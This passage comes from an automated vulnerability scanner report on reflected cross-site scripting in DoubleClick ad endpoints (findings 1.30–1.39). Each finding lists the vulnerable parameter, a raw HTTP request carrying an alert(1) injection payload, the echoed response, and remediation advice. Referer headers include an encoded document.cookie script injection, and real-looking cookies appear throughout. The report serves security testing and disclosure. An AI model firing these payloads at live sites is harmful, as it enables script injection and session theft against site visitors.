Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5885

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Sun Oct 10 23:15:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
click.net/click%3Bh%3Dv8/3aa7/f/a6/%2a/r%3B228033667%3B0-0%3B0%3B51919807%3B2321-160/600%3B38814481/38832238/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657f3696"-alert(1)-"456ec64c8fc&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=https%3a%2f%2fwww.maxclarity.com/tv/%3Fuid%3DBN1_PSD1");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
v
...[SNIP]...

1.30. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [mt_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.4

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18d99'-alert(1)-'38e55555851 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.4;sz=160x600;click=http://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=10065718d99'-alert(1)-'38e55555851&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=71564039248027041? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045701817&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5885

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Sun Oct 10 23:15:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
click.net/click%3Bh%3Dv8/3aa7/f/a6/%2a/r%3B228033667%3B0-0%3B0%3B51919807%3B2321-160/600%3B38814481/38832238/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=10065718d99'-alert(1)-'38e55555851&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=https%3a%2f%2fwww.maxclarity.com/tv/%3Fuid%3DBN1_PSD1\">
...[SNIP]...

1.31. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [mt_uuid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.4

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8808b'-alert(1)-'f04a9d4c145 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.4;sz=160x600;click=http://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a95612958808b'-alert(1)-'f04a9d4c145&redirect=;ord=71564039248027041? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045701817&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5885

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Sun Oct 10 23:15:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
-0%3B0%3B51919807%3B2321-160/600%3B38814481/38832238/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a95612958808b'-alert(1)-'f04a9d4c145&redirect=https%3a%2f%2fwww.maxclarity.com/tv/%3Fuid%3DBN1_PSD1\">
...[SNIP]...

1.32. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [mt_uuid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.4

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f01bd"-alert(1)-"fee235b1bf2 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.4;sz=160x600;click=http://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295f01bd"-alert(1)-"fee235b1bf2&redirect=;ord=71564039248027041? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045701817&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5885

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Sun Oct 10 23:15:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
-0%3B0%3B51919807%3B2321-160/600%3B38814481/38832238/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295f01bd"-alert(1)-"fee235b1bf2&redirect=https%3a%2f%2fwww.maxclarity.com/tv/%3Fuid%3DBN1_PSD1");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var o
...[SNIP]...

1.33. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.4

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6caa1"-alert(1)-"7a04f899c71 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.4;sz=160x600;click=http://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=6caa1"-alert(1)-"7a04f899c71 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045701817&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5855
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 07 Feb 2011 02:28:52 GMT
Expires: Mon, 07 Feb 2011 02:28:52 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Sun Oct 10 23:15:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
1919807%3B2321-160/600%3B38814481/38832238/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=6caa1"-alert(1)-"7a04f899c71https://www.maxclarity.com/tv/?uid=BN1_PSD1");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
...[SNIP]...

1.34. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.4

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb0bf'-alert(1)-'66f3aad0857 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.4;sz=160x600;click=http://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=bb0bf'-alert(1)-'66f3aad0857 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045701817&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5855
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 07 Feb 2011 02:28:56 GMT
Expires: Mon, 07 Feb 2011 02:28:56 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Sun Oct 10 23:15:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
1919807%3B2321-160/600%3B38814481/38832238/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=bb0bf'-alert(1)-'66f3aad0857https://www.maxclarity.com/tv/?uid=BN1_PSD1\">
...[SNIP]...

1.35. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.4

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90fb0"-alert(1)-"59611f3a704 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.4;sz=160x600;click=http://pixel.mathtag.com/click/img?mt_aid=7156403924802704190fb0"-alert(1)-"59611f3a704&mt_id=100657&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=71564039248027041? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045701817&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5885

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Sun Oct 10 23:15:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
p://ad.doubleclick.net/click%3Bh%3Dv8/3aa7/f/a6/%2a/r%3B228033667%3B0-0%3B0%3B51919807%3B2321-160/600%3B38814481/38832238/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=7156403924802704190fb0"-alert(1)-"59611f3a704&mt_id=100657&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=https%3a%2f%2fwww.maxclarity.com/tv/%3Fuid%3DBN1_PSD1");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode =
...[SNIP]...

1.36. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.4

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc9d4'-alert(1)-'8d9112ba486 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.4;sz=160x600;click=http://pixel.mathtag.com/click/img?mt_aid=71564039248027041cc9d4'-alert(1)-'8d9112ba486&mt_id=100657&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=71564039248027041? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045701817&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:19 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5885

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Sun Oct 10 23:15:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
p://ad.doubleclick.net/click%3Bh%3Dv8/3aa7/f/a6/%2a/r%3B228033667%3B0-0%3B0%3B51919807%3B2321-160/600%3B38814481/38832238/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=71564039248027041cc9d4'-alert(1)-'8d9112ba486&mt_id=100657&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=https%3a%2f%2fwww.maxclarity.com/tv/%3Fuid%3DBN1_PSD1\">
...[SNIP]...

1.37. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [mt_adid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.55

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55862'-alert(1)-'5c8556f2836 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.55;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134&mt_adid=8455862'-alert(1)-'5c8556f2836&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=58348799077260653? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045650111&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F24
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5908

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 20:32:44 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
click%3Bh%3Dv8/3aa7/f/a6/%2a/v%3B235160821%3B0-0%3B0%3B59013435%3B3454-728/90%3B40328572/40346359/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134&mt_adid=8455862'-alert(1)-'5c8556f2836&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http%3a%2f%2fwww.clearskinresolution.com/%3Fuid%3DBN1_PSD1_CSR\">
...[SNIP]...

1.38. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [mt_adid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.55

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4aec3"-alert(1)-"b8c1ebf1bd1 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.55;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134&mt_adid=844aec3"-alert(1)-"b8c1ebf1bd1&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=58348799077260653? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045650111&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F24
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:27:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5908

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 20:32:44 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
click%3Bh%3Dv8/3aa7/f/a6/%2a/v%3B235160821%3B0-0%3B0%3B59013435%3B3454-728/90%3B40328572/40346359/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134&mt_adid=844aec3"-alert(1)-"b8c1ebf1bd1&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http%3a%2f%2fwww.clearskinresolution.com/%3Fuid%3DBN1_PSD1_CSR");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var
...[SNIP]...

1.39. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [mt_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.55

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19f04'-alert(1)-'18424983c20 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.55;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=10813419f04'-alert(1)-'18424983c20&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=58348799077260653? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045650111&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F24
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:27:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5908

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 20:32:44 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
eclick.net/click%3Bh%3Dv8/3aa7/f/a6/%2a/v%3B235160821%3B0-0%3B0%3B59013435%3B3454-728/90%3B40328572/40346359/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=10813419f04'-alert(1)-'18424983c20&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http%3a%2f%2fwww.clearskinresolution.com/%3Fuid%3DBN1_PSD1_CSR\">
...[SNIP]...

